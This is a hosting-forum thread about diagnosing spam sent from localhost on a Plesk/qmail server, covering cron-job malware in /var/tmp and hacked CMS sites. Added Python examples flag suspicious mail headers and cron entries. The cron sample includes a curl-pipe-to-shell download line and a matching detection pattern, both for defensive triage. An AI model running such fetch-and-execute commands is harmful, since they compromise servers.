
Question: Spam from localhost

MarcusR

New Pleskian
One of my servers started sending spam, not many, like 10 or 20 a day.

Debian 7.11
Plesk Version 12.0.18
Qmail
With mailman and localhost 127.0.0.1 in whitelist

These are the facts:
- the spam is sent from different domains hosted on the server
- sometimes the mail sender is a real mailbox, but sometimes it is an existing alias with a non-existent mailbox
- sendmail-wrapper is inconspicuous
- double-checked PHP scripts, nothing

This is the header of one of those mails:

Code:
Return-Path: <existing_mailbox@on_my_server.com>
Received: (qmail 4582 invoked from network); 22 Aug 2016 08:40:45 +0200
Received: from localhost (HELO existing_domain_on_my_server.com) (127.0.0.1)
  by localhost with ESMTPA; 22 Aug 2016 08:40:45 +0200
Date: Mon, 22 Aug 2016 06:40:45 +0000 (UTC)
From: denox-kfz <existing_mailbox@on_my_server.com>
To: [email protected]
Message-ID: <929839540.19093687.1471848045740@existing_domain_on_my_server.com>
Subject:  hi jamesydaboy2k8
MIME-Version: 1.0
Content-Type: multipart/alternative;
  boundary="----=_Part_19093686_1967554495.1471848045740"
X-mailer: Mailer v1.0

log
Code:
Aug 22 08:40:45 my_server /var/qmail/bin/relaylock[4577]: /var/qmail/bin/relaylock: mail from 127.0.0.1:51000 (localhost)
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: Handlers Filter before-queue for qmail started ...
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: from=existing_mailbox@on_my_server.com
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: [email protected]
Aug 22 08:40:45 my_server greylisting filter[4580]: Starting greylisting filter...
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: handlers_stderr: SKIP
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: SKIP during call 'grey' handler
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: handlers_stderr: SKIP
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: SKIP during call 'check-quota' handler
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: starter: submitter[4582] exited normally
Aug 22 08:40:46 my_server qmail: 1471848046.264218 new msg 11936894
Aug 22 08:40:46 my_server qmail: 1471848046.264244 info msg 11936894: bytes 1678 from <existing_mailbox@on_my_server.com> qp 4582 uid 2020
Aug 22 08:40:46 my_server qmail: 1471848046.731967 starting delivery 532: msg 11936894 to remote [email protected]
Aug 22 08:40:46 my_server qmail: 1471848046.731993 status: local 0/10 remote 1/20
Aug 22 08:40:46 my_server qmail-remote-handlers[4585]: Handlers Filter before-remote for qmail started ...
Aug 22 08:40:46 my_server qmail-remote-handlers[4585]: from=existing_mailbox@on_my_server.com
Aug 22 08:40:46 my_server qmail-remote-handlers[4585]: [email protected]

Any idea how to get rid of that s**t, garbage?
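To triage messages like the one quoted above, here is an added example (not code from the thread or from Plesk) that parses the Received hops and flags a loopback client that was accepted as a relaying (ESMTPA) sender, or that announced a HELO other than the server's own mail hostname. The hostname mail.on_my_server.com and both header samples are constructed for the example.

```python
import re

# Received header shape from the thread's sample (qmail-smtpd, "by localhost with ESMTPA").
RECEIVED_RE = re.compile(
    r"from\s+(?P<host>\S+)\s+\(HELO\s+(?P<helo>[^)]+)\)\s+\((?P<ip>[^)]+)\)"
    r"\s+by\s+(?P<by>\S+)\s+with\s+(?P<proto>\S+);", re.IGNORECASE)

def unfold_headers(raw):
    """Join folded continuation lines (leading whitespace) back onto their header line."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line.rstrip())
    return lines

def parse_received(raw):
    """Return one dict per Received hop that carries a HELO name and client IP."""
    hops = []
    for line in unfold_headers(raw):
        if line.lower().startswith("received:"):
            m = RECEIVED_RE.search(line)
            if m:
                hops.append(m.groupdict())
    return hops

def triage(raw, mail_hostname):
    """Reasons the message looks injected locally; an empty list means nothing odd."""
    reasons = []
    for hop in parse_received(raw):
        if hop["ip"] != "127.0.0.1":
            continue  # only loopback submissions are of interest here
        if hop["proto"].upper().startswith("ESMTPA"):
            reasons.append("loopback client accepted as an authenticated/relaying (ESMTPA) sender")
        if hop["helo"].lower() != mail_hostname.lower():
            reasons.append("loopback HELO %s is not the mail server name %s" % (hop["helo"], mail_hostname))
    return reasons

# Constructed samples: the first mirrors the thread's spam headers, the second a normal inbound hop.
SPAM_HEADERS = """\
Return-Path: <existing_mailbox@on_my_server.com>
Received: (qmail 4582 invoked from network); 22 Aug 2016 08:40:45 +0200
Received: from localhost (HELO existing_domain_on_my_server.com) (127.0.0.1)
  by localhost with ESMTPA; 22 Aug 2016 08:40:45 +0200
From: denox-kfz <existing_mailbox@on_my_server.com>
"""
CLEAN_HEADERS = """\
Received: from mail.on_my_server.com (HELO mail.on_my_server.com) (203.0.113.5)
  by localhost with ESMTP; 22 Aug 2016 09:00:00 +0200
"""
```

Running `triage(SPAM_HEADERS, "mail.on_my_server.com")` returns two reasons for the sample, while the clean hop returns none.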
 
Hi UFHH01,
thanks for your reply - I knew these KB articles already. There is nothing special, like a compromised script...
The HELO comes from existing_domain_on_my_server.com, but not from the regular mail server name.
Just for testing purposes I removed 127.0.0.1 from the whitelist, which solved it, but now I have a problem with mailman.

qmail cfg:
smtp
Code:
    socket_type     = stream
    protocol        = tcp
    wait            = no
    disable        = no
    user            = root
    flags        = IPv6
    instances       = UNLIMITED
    env             = SMTPAUTH=1
    server          = /var/qmail/bin/tcp-env
    server_args     = -Rt0 /var/qmail/bin/relaylock /usr/sbin/rblsmtpd -r sbl.spamhaus.org -r zen.spamhaus.org -r ix.dnsbl.manitu.net /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true
smtps
Code:
    socket_type     = stream
    protocol        = tcp
    wait            = no
    disable        = no
    user            = root
    flags        = IPv6
    instances       = UNLIMITED
    env             = SMTPAUTH=1
    server          = /var/qmail/bin/tcp-env
    server_args     = -Rt0 /var/qmail/bin/relaylock /usr/sbin/rblsmtpd -r sbl.spamhaus.org -r zen.spamhaus.org -r ix.dnsbl.manitu.net /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true

submission
Code:
    socket_type     = stream
    protocol        = tcp
    wait            = no
    disable        = no
    user            = qmaild
    flags        = IPv6
    instances       = UNLIMITED
    env             = SUBMISSION=1 SMTPAUTH=1
    server          = /var/qmail/bin/tcp-env
    server_args     = -Rt0 /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true
 
Check the process list (ps -aux) on your console to see whether a second SMTP server has been installed, e.g. exim (ps -aux | grep exim). Check your crontab jobs for jobs with awkward names like /var/tmp/Xdj389a.php. Hackers have lately been using Plesk accounts with shell access to set up a cron job that runs a script in the temporary directory, which in turn starts a mail server that they brought in. Spam is then sent through that mail server, bypassing all Plesk security mechanisms and not showing the source in /var/log/maillog.
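An added example (not Peter's or Plesk's code) that implements the crontab check described above: it scans a combined crontab dump and flags entries that run code from a world-writable temp directory or pipe a download straight into an interpreter. The dump is constructed for the example, reusing the /var/tmp/Xdj389a.php name from this post; the user names and the curl entry are made up.

```python
import re

# Constructed dump in the shape of "crontab -l -u USER" output for several users,
# each line prefixed with the owning user. Not taken from any real server.
SAMPLE_CRONTABS = """\
root    17 *   * * *   cd / && run-parts --report /etc/cron.hourly
root    0 3   * * *   /usr/local/psa/admin/sbin/backupmng >/dev/null 2>&1
apache  */5 * * * *   /usr/bin/php /var/tmp/Xdj389a.php >/dev/null 2>&1
shop    * * * * *     curl -s http://203.0.113.10/x.sh | sh
www     0 1 * * *     /usr/bin/php /var/www/vhosts/shop.example/httpdocs/cron.php
"""

# Directories a legitimate Plesk cron job has no reason to execute code from.
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# user, five schedule fields, then the command (no @reboot-style shortcuts in this sample).
CRON_RE = re.compile(r"^(?P<user>\S+)\s+(?P<sched>(?:\S+\s+){5})(?P<cmd>.+)$")
PIPE_TO_INTERP_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|php|perl|python)\b")

def suspicious_cron_entries(dump):
    """Return a list of {user, cmd, reasons} for cron lines that match a known bad pattern."""
    findings = []
    for line in dump.splitlines():
        m = CRON_RE.match(line)
        if not m:
            continue  # comments, env assignments or blank lines
        cmd = m["cmd"].strip()
        reasons = []
        if any(d in cmd for d in TEMP_DIRS):
            reasons.append("runs code from a world-writable temp directory")
        if PIPE_TO_INTERP_RE.search(cmd):
            reasons.append("pipes a download straight into an interpreter")
        if reasons:
            findings.append({"user": m["user"], "cmd": cmd, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in suspicious_cron_entries(SAMPLE_CRONTABS):
        print("%-8s %s\n         -> %s" % (f["user"], f["cmd"], "; ".join(f["reasons"])))
```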
 
Anyone figure this out? We are experiencing the same thing and having such a hard time tracking down the culprit.

Peter - we did find one of those. It was a cron named apache pointing to a script in /var/tmp/ ... We removed that; however, the subtle spam messages are still creeping through. Plesk shows a failure notice (bounce); however, once you drill in, we see it's coming from localhost with a From like this: From: " Facebook 2 friend request"

Hoping someone out there can help. Thanks.
 
Spam can have many different sources. If you found one, it does not necessarily mean that the spam stops, because other scripts will still be active. Many times Wordpress or Joomla installations have been hacked. They might send a low number of spam messages every once in a while to bypass outgoing mail limits. Your only option in such cases is to identify the bad plugin and remove it, to clean the website of malware. If the source is "localhost", the spam is most likely coming from such a compromised website. Lately we have also seen spam sent through the known Wordpress Jetpack vulnerability (Topic: Jetpack Sharing email can be abused for spam « WordPress.org Forums), but there can be many more sources.
 
Thanks Peter. Yup, I thought we had it solved last night; however, it's spamming again this morning. Yesterday we followed the Plesk guidelines, monitored, then verified all scripts that were triggered, and none of them looked suspicious. It's definitely a hard-to-find one. Maybe you're right with regards to WordPress. There are a number of client instances installed, but I haven't found any with blatant hacks. I will check out Jetpack. Any other advice or suggestions are appreciated. Thanks!
 
We have seen a reduction in spam by blocking SSH through the firewall and only allowing specific IP addresses. That certainly helped. Some spam is still creeping through, and we are working to locate it. This is by far the hardest spam fight I have ever faced... stay tuned for more.
 